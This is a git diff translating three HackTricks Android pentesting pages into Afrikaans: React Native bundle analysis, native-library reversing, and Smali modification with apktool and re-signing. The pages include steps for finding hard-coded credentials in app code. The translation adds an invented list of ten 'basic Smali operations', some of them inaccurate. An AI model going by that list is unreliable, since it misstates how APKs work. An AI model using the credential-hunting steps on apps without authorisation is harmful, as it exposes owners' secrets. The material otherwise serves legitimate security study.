- - diff --git a/mobile-pentesting/android-app-pentesting/react-native-application.md b/mobile-pentesting/android-app-pentesting/react-native-application.md index 3bc0075d9..3d470d5ad 100644 --- a/mobile-pentesting/android-app-pentesting/react-native-application.md +++ b/mobile-pentesting/android-app-pentesting/react-native-application.md @@ -1,68 +1,62 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# React Native Application Analysis +# Analise van React Native-toepassing -To confirm if the application was built on the React Native framework, follow these steps: +Om te bevestig of die toepassing op die React Native-raamwerk gebou is, volg hierdie stappe: -1. Rename the APK file with a zip extension and extract it to a new folder using the command `cp com.example.apk example-apk.zip` and `unzip -qq example-apk.zip -d ReactNative`. +1. Hernoem die APK-lêer met 'n zip-uitbreiding en pak dit uit na 'n nuwe gids met die opdrag `cp com.example.apk example-apk.zip` en `unzip -qq example-apk.zip -d ReactNative`. -2. Navigate to the newly created ReactNative folder and locate the assets folder. Inside this folder, you should find the file `index.android.bundle`, which contains the React JavaScript in a minified format. +2. Navigeer na die nuutgeskepte ReactNative-gids en vind die bates-gids. Binne hierdie gids moet jy die lêer `index.android.bundle` vind, wat die React JavaScript in 'n geminifiseerde formaat bevat. -3. Use the command `find . -print | grep -i ".bundle$"` to search for the JavaScript file. - -To further analyze the JavaScript code, create a file named `index.html` in the same directory with the following code: +3. Gebruik die opdrag `find . -print | grep -i ".bundle$"` om na die JavaScript-lêer te soek. +Om die JavaScript-kode verder te analiseer, skep 'n lêer met die naam `index.html` in dieselfde gids met die volgende kode: ```html ``` +Jy kan die lêer oplaai na [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) of volg hierdie stappe: -You can upload the file to [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) or follow these steps: +1. Maak die `index.html` lêer oop in Google Chrome. -1. Open the `index.html` file in Google Chrome. +2. Maak die Ontwikkelaarstoolbalk oop deur **Command+Option+J vir OS X** of **Control+Shift+J vir Windows** te druk. 
-2. Open the Developer Toolbar by pressing **Command+Option+J for OS X** or **Control+Shift+J for Windows**. +3. Klik op "Bronne" in die Ontwikkelaarstoolbalk. Jy behoort 'n JavaScript-lêer te sien wat verdeel is in gids en lêers, wat die hoofbundel uitmaak. -3. Click on "Sources" in the Developer Toolbar. You should see a JavaScript file that is split into folders and files, making up the main bundle. +As jy 'n lêer genaamd `index.android.bundle.map` vind, sal jy die bronkode in 'n ongeminifiseerde formaat kan analiseer. Kaartlêers bevat bronkartering, wat jou in staat stel om geminifiseerde identifiseerders te karteer. -If you find a file called `index.android.bundle.map`, you will be able to analyze the source code in an unminified format. Map files contain source mapping, which allows you to map minified identifiers. +Om te soek na sensitiewe geloofsbriewe en eindpunte, volg hierdie stappe: -To search for sensitive credentials and endpoints, follow these steps: +1. Identifiseer sensitiewe sleutelwoorde om die JavaScript-kode te analiseer. React Native-toepassings gebruik dikwels derdeparty-diens soos Firebase, AWS S3-diens-eindpunte, private sleutels, ens. -1. Identify sensitive keywords to analyze the JavaScript code. React Native applications often use third-party services like Firebase, AWS S3 service endpoints, private keys, etc. +2. In hierdie spesifieke geval is daar opgemerk dat die toepassing die Dialogflow-diens gebruik. Soek na 'n patroon wat verband hou met sy konfigurasie. -2. In this specific case, the application was observed to be using the Dialogflow service. Search for a pattern related to its configuration. +3. Dit was gelukkig dat sensitiewe hardgekodeerde geloofsbriewe gevind is in die JavaScript-kode gedurende die verkenningsproses. -3. It was fortunate that sensitive hard-coded credentials were found in the JavaScript code during the recon process. 
- -## References +## Verwysings * [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 028f2cc59..e9c4e8428 100644 --- a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -1,72 +1,72 @@ -# Reversing Native Libraries +# Omgekeerde Ingenieurswese van Inheemse Biblioteke
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**For further information check: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)** +**Vir verdere inligting, kyk: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)** -Android apps can use native libraries, typically written in C or C++, for performance-critical tasks. Malware creators also use these libraries, as they're harder to reverse engineer than DEX bytecode. The section emphasizes reverse engineering skills tailored to Android, rather than teaching assembly languages. ARM and x86 versions of libraries are provided for compatibility. +Android-apps kan inheemse biblioteke gebruik, tipies geskryf in C of C++, vir prestasie-kritieke take. Malware-skeppers gebruik ook hierdie biblioteke, omdat dit moeiliker is om te ontleed as DEX-bytekode. Die afdeling beklemtoon omgekeerde ingenieurswese-vaardighede wat toegespits is op Android, eerder as om assambleertaal te leer. ARM- en x86-weergawes van biblioteke word verskaf vir versoenbaarheid. -### Key Points: -- **Native Libraries in Android Apps:** - - Used for performance-intensive tasks. - - Written in C or C++, making reverse engineering challenging. - - Found in `.so` (shared object) format, similar to Linux binaries. - - Malware creators prefer native code to make analysis harder. +### Sleutelpunte: +- **Inheemse Biblioteke in Android-apps:** +- Gebruik vir prestasie-intensiewe take. +- Geskryf in C of C++, wat omgekeerde ingenieurswese uitdagend maak. +- Word gevind in `.so` (gedeelde voorwerp) formaat, soortgelyk aan Linux-binêre lêers. +- Malware-skeppers verkies inheemse kode om analise moeiliker te maak. - **Java Native Interface (JNI) & Android NDK:** - - JNI allows Java methods to be implemented in native code. - - NDK is an Android-specific set of tools to write native code. 
- - JNI and NDK bridge Java (or Kotlin) code with native libraries. +- JNI maak dit moontlik dat Java-metodes in inheemse kode geïmplementeer kan word. +- NDK is 'n Android-spesifieke stel gereedskap om inheemse kode te skryf. +- JNI en NDK koppel Java (of Kotlin) kode met inheemse biblioteke. -- **Library Loading & Execution:** - - Libraries are loaded into memory using `System.loadLibrary` or `System.load`. - - JNI_OnLoad is executed upon library loading. - - Java-declared native methods link to native functions, enabling execution. +- **Biblioteeklaaiing & Uitvoering:** +- Biblioteke word in die geheue gelaai deur gebruik te maak van `System.loadLibrary` of `System.load`. +- JNI_OnLoad word uitgevoer wanneer die biblioteek gelaai word. +- Java-verklaarde inheemse metodes skakel na inheemse funksies, wat uitvoering moontlik maak. -- **Linking Java Methods to Native Functions:** - - **Dynamic Linking:** Function names in native libraries match a specific pattern, allowing automatic linking. - - **Static Linking:** Uses `RegisterNatives` for linking, providing flexibility in function naming and structure. +- **Koppeling van Java-metodes aan Inheemse Funksies:** +- **Dinamiese Koppeling:** Funksienames in inheemse biblioteke stem ooreen met 'n spesifieke patroon, wat outomatiese koppeling moontlik maak. +- **Statiese Koppeling:** Gebruik `RegisterNatives` vir koppeling, wat buigsaamheid bied in funksienamering en -struktuur. -- **Reverse Engineering Tools and Techniques:** - - Tools like Ghidra and IDA Pro help analyze native libraries. - - `JNIEnv` is crucial for understanding JNI functions and interactions. - - Exercises are provided to practice loading libraries, linking methods, and identifying native functions. +- **Omgekeerde Ingenieurswese-hulpmiddels en -tegnieke:** +- Hulpmiddels soos Ghidra en IDA Pro help om inheemse biblioteke te analiseer. +- `JNIEnv` is van kritieke belang vir die verstaan van JNI-funksies en interaksies. 
+- Oefeninge word verskaf om die laai van biblioteke, koppeling van metodes en identifisering van inheemse funksies te oefen. -### Resources: -- **Learning ARM Assembly:** - - Suggested for a deeper understanding of the underlying architecture. - - [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) from Azeria Labs is recommended. +### Hulpbronne: +- **Leer ARM-assambleertaal:** +- Aanbeveel vir 'n dieper begrip van die onderliggende argitektuur. +- [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) van Azeria Labs word aanbeveel. -- **JNI & NDK Documentation:** - - [Oracle's JNI Specification](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) - - [Android's JNI Tips](https://developer.android.com/training/articles/perf-jni) - - [Getting Started with the NDK](https://developer.android.com/ndk/guides/) +- **JNI & NDK-dokumentasie:** +- [Oracle se JNI-spesifikasie](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) +- [Android se JNI-tips](https://developer.android.com/training/articles/perf-jni) +- [Begin met die NDK](https://developer.android.com/ndk/guides/) -- **Debugging Native Libraries:** - - [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3) +- **Debugeer Inheemse Biblioteke:** +- [Debugeer Android Inheemse Biblioteke met JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
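Review bot: the sub-bullets in the reversing-native-libraries.md hunk lose their nesting, so the two-level key-points list becomes a flat one. The removed lines are indented (`- - Used for performance-intensive tasks.`, `- - JNI allows Java methods to be implemented in native code.`) but the added ones are not (`+- Gebruik vir prestasie-intensiewe take.`, `+- JNI maak dit moontlik ...`), and the same happens under `### Hulpbronne:` (`+- Aanbeveel vir 'n dieper begrip ...`). Restore the leading indent on every translated sub-item so it still renders under its bold parent item. Also, `- **Java Native Interface (JNI) & Android NDK:**` is the only key-point heading left in English while its siblings (`**Inheemse Biblioteke in Android-apps:**`, `**Biblioteeklaaiing & Uitvoering:**`) are translated; either translate it for consistency or leave all four headings in English.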
diff --git a/mobile-pentesting/android-app-pentesting/smali-changes.md b/mobile-pentesting/android-app-pentesting/smali-changes.md index 911465ee1..825963cd0 100644 --- a/mobile-pentesting/android-app-pentesting/smali-changes.md +++ b/mobile-pentesting/android-app-pentesting/smali-changes.md @@ -1,130 +1,113 @@ -# Smali - Decompiling/\[Modifying]/Compiling +# Smali - Ontkompilering/\[Wysiging]/Kompilering
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it. +Soms is dit interessant om die toepassingskode te wysig om toegang te verkry tot verborge inligting vir jou (miskien goed verduisterde wagwoorde of vlae). Dan kan dit interessant wees om die apk te ontkompileer, die kode te wysig en dit weer te kompileer. -**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html) +**Opcodes verwysing:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html) -## Fast Way +## Vinnige Metode -Using **Visual Studio Code** and the [APKLab](https://github.com/APKLab/APKLab) extension, you can **automatically decompile**, modify, **recompile**, sign & install the application without executing any command. +Met behulp van **Visual Studio Code** en die [APKLab](https://github.com/APKLab/APKLab) uitbreiding, kan jy die toepassing **outomaties ontkompileer**, wysig, **kompileer**, onderteken & installeer sonder om enige bevel uit te voer. -Another **script** that facilitates this task a lot is [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh) +'n Ander **skripsie** wat hierdie taak baie vergemaklik, is [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh) -## Decompile the APK - -Using APKTool you can access to the **smali code and resources**: +## Ontkompileer die APK +Met behulp van APKTool kan jy toegang kry tot die **smali-kode en hulpbronne**: ```bash apktool d APP.apk ``` +As **apktool** jou enige fout gee, probeer om die [**nuutste weergawe**](https://ibotpeaches.github.io/Apktool/install/) te installeer. 
-If **apktool** gives you any error, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) +Sommige **interessante lêers waarop jy moet let** is: -Some **interesting files you should look are**: - -* _res/values/strings.xml_ (and all xmls inside res/values/\*) +* _res/values/strings.xml_ (en alle xml's binne res/values/\*) * _AndroidManifest.xml_ -* Any file with extension _.sqlite_ or _.db_ +* Enige lêer met die uitbreiding _.sqlite_ of _.db_ -If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** (Do not decode resources). Then, if the problem was in a resource and not in the source code, you won't have the problem (you won't also decompile the resources). +As `apktool` **probleme ondervind met die dekodeer van die toepassing**, kyk na [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) of probeer om die argument **`-r`** te gebruik (Dekodeer nie hulpbronne nie). As die probleem in 'n hulpbron was en nie in die bronkode nie, sal jy nie die probleem hê nie (jy sal ook nie die hulpbronne dekodeer nie). -## Change smali code +## Verander smali-kode -You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VS Code**](https://code.visualstudio.com), you then install the **smalise extension** and the editor will tell you if any **instruction is incorrect**.\ -Some **examples** can be found here: +Jy kan **instruksies verander**, die **waarde** van sommige veranderlikes verander of **nuwe instruksies byvoeg**. 
Ek verander die Smali-kode met behulp van [**VS Code**](https://code.visualstudio.com), jy installeer dan die **smalise-uitbreiding** en die redakteur sal jou vertel of enige **instruksie onjuis** is.\ +Sommige **voorbeelde** kan hier gevind word: -* [Smali changes examples](smali-changes.md) +* [Voorbeelde van Smali-veranderinge](smali-changes.md) * [Google CTF 2018 - Shall We Play a Game?](google-ctf-2018-shall-we-play-a-game.md) -Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali). +Of jy kan [**hieronder 'n paar Smali-veranderinge wat verduidelik word, nagaan**](smali-changes.md#modifying-smali). -## Recompile the APK - -After modifying the code you can **recompile** the code using: +## Kompileer die APK weer +Nadat jy die kode verander het, kan jy die kode **kompileer** deur gebruik te maak van: ```bash apktool b . #In the folder generated when you decompiled the application ``` +Dit sal die nuwe APK **kompileer** binne die _**dist**_ vouer. -It will **compile** the new APK **inside** the _**dist**_ folder. 
+As **apktool** 'n **fout** gooi, probeer [die **nuutste weergawe** installeer](https://ibotpeaches.github.io/Apktool/install/) -If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) - -### **Sign the new APK** - -Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly): +### **Onderteken die nuwe APK** +Dan moet jy 'n **sleutel genereer** (jy sal gevra word vir 'n wagwoord en vir sommige inligting wat jy lukraak kan invul): ```bash keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias ``` - -Finally, **sign** the new APK: - +Uiteindelik, **teken** die nuwe APK: ```bash jarsigner -keystore key.jks path/to/dist/* ``` +### Optimeer nuwe aansoek -### Optimize new application - -**zipalign** is an archive alignment tool that provides important optimisation to Android application (APK) files. [More information here](https://developer.android.com/studio/command-line/zipalign). - +**zipalign** is 'n argief-uitlyningstool wat belangrike optimalisering aan Android-aansoek (APK) lêers bied. [Meer inligting hier](https://developer.android.com/studio/command-line/zipalign). ```bash zipalign [-f] [-v] infile.apk outfile.apk zipalign -v 4 infile.apk ``` +### **Onderteken die nuwe APK (weer?)** -### **Sign the new APK (again?)** - -If you **prefer** to use [**apksigner**](https://developer.android.com/studio/command-line/) instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling. BUT NOTICE THAT YOU ONLY HAVE TO **SIGN THE APPLCIATION ONCE** WITH jarsigner (before zipalign) OR WITH aspsigner (after zipaling). - +As jy verkies om [apksigner](https://developer.android.com/studio/command-line/) te gebruik in plaas van jarsigner, moet jy die apk onderteken nadat jy die optimalisering met zipalign toegepas het. 
MAAR LET OP DAT JY DIE AANSOEK SLEGS EEN KEER MOET ONDERTEKEN MET jarsigner (voor zipalign) OF MET apksigner (na zipalign). ```bash apksigner sign --ks key.jks ./dist/mycompiled.apk ``` +## Wysiging van Smali -## Modifying Smali - -For the following Hello World Java code: - +Vir die volgende Hello World Java-kode: ```java public static void printHelloWorld() { - System.out.println("Hello World") +System.out.println("Hello World") } ``` - -The Smali code would be: - +Die Smali-kode sal wees: ```java .method public static printHelloWorld()V - .registers 2 - sget-object v0, Ljava/lang/System;->out:Ljava/io/PrintStream; - const-string v1, "Hello World" - invoke-virtual {v0,v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V - return-void +.registers 2 +sget-object v0, Ljava/lang/System;->out:Ljava/io/PrintStream; +const-string v1, "Hello World" +invoke-virtual {v0,v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V +return-void .end method ``` +Die Smali instruksie stel is beskikbaar [hier](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions). -The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions). +### Ligte Veranderinge -### Light Changes - -### Modify initial values of a variable inside a function - -Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones: +### Wysig aanvanklike waardes van 'n veranderlike binne 'n funksie +Sommige veranderlikes word aan die begin van die funksie gedefinieer deur die opcode _const_, jy kan sy waardes wysig, of jy kan nuwe een definieer: ```bash #Number const v9, 0xf4240 
@@ -132,9 +115,51 @@ const/4 v8, 0x1 #Strings const-string v5, "wins" ``` +### Basiese Operasies -### Basic Operations +#### Smali-lêers wysig +Smali-lêers is die mensleesbare weergawe van die Android Dalvik Bytecode. Dit kan gewysig word om die gedrag van 'n Android-toepassing te verander. Hier is 'n paar basiese operasies wat jy kan uitvoer op Smali-lêers: + +##### 1. Instruksies toevoeg + +Jy kan nuwe instruksies byvoeg om die funksionaliteit van die toepassing te verander. Byvoorbeeld, jy kan 'n nuwe funksie implementeer deur die nodige Smali-instruksies by te voeg. + +##### 2. Instruksies verwyder + +As jy 'n spesifieke funksie of gedrag wil uitskakel, kan jy die relevante Smali-instruksies verwyder. Dit sal verhoed dat die toepassing daardie spesifieke funksie uitvoer. + +##### 3. Instruksies wysig + +Jy kan bestaande Smali-instruksies wysig om die funksionaliteit van die toepassing aan te pas. Byvoorbeeld, jy kan 'n waarde verander wat deur 'n instruksie gebruik word, of jy kan 'n voorwaardelike instruksie verander om 'n ander pad te volg. + +##### 4. Metodes vervang + +Jy kan bestaande metodes in die Smali-lêer vervang met jou eie implementasie. Dit gee jou die vermoë om die funksionaliteit van die toepassing te verander sonder om nuwe instruksies by te voeg. + +##### 5. Klasstruktuur wysig + +Jy kan die klasstruktuur van die Smali-lêer wysig deur klasse te verwyder, nuwe klasse by te voeg of bestaande klasse te wysig. Hierdie operasie kan die gedrag van die toepassing drasties verander. + +##### 6. Hulpbronne wysig + +Smali-lêers bevat ook verwysings na hulpbronne soos teks, beelde en klanklêers. Jy kan hierdie hulpbronne wysig om die visuele of klankaspekte van die toepassing te verander. + +##### 7. Manifestlêer wysig + +Die manifestlêer bevat belangrike inligting oor die toepassing, soos die toestemmings wat dit vereis en die komponente wat dit bevat. Jy kan die manifestlêer wysig om die toepassing se gedrag te beïnvloed. + +##### 8. 
Smali-lêers saamvoeg + +As jy 'n nuwe funksie wil toevoeg wat afhanklik is van bestaande Smali-kode, kan jy die lêers saamvoeg om die funksionaliteit te bereik. + +##### 9. Smali-lêers opsplit + +As jy slegs 'n deel van die Smali-kode wil wysig, kan jy die lêers opsplit en slegs die relevante deel wysig. + +##### 10. Smali-lêers onderteken + +Nadat jy die Smali-lêers gewysig het, moet jy dit onderteken om te verseker dat die toepassing korrek uitgevoer word. ```bash #Math add-int/lit8 v0, v2, 0x1 #v2 + 0x1 and save it in v0 @@ -157,11 +182,9 @@ iput v0, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I #Save v0 inside if-ne v0, v9, :goto_6 #If not equals, go to: :goto_6 goto :goto_6 #Always go to: :goto_6 ``` - -### Bigger Changes +### Groter Veranderinge ### Logging - ```bash #Log win: iget v5, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I #Get this.o inside v5 
@@ -170,21 +193,19 @@ move-result-object v1 #Move to v1 const-string v5, "wins" #Save "win" inside v5 invoke-static {v5, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I #Logging "Wins: " ``` +Aanbevelings: -Recommendations: +* As jy verklaarde veranderlikes binne die funksie gaan gebruik (verklaarde v0,v1,v2...), plaas hierdie lyne tussen die _.local \_ en die verklarings van die veranderlikes (_const v0, 0x1_) +* As jy die logkode in die middel van die funksie se kode wil plaas: +* Voeg 2 by die aantal verklaarde veranderlikes: Byvoorbeeld: vanaf _.locals 10_ na _.locals 12_ +* Die nuwe veranderlikes moet die volgende nommers van die reeds verklaarde veranderlikes wees (in hierdie voorbeeld moet dit _v10_ en _v11_ wees, onthou dat dit begin by v0). +* Verander die kode van die logfunksie en gebruik _v10_ en _v11_ in plaas van _v5_ en _v1_. -* If you are going to use declared variables inside the function (declared v0,v1,v2...) put these lines between the _.local \_ and the declarations of the variables (_const v0, 0x1_) -* If you want to put the logging code in the middle of the code of a function: - * Add 2 to the number of declared variables: 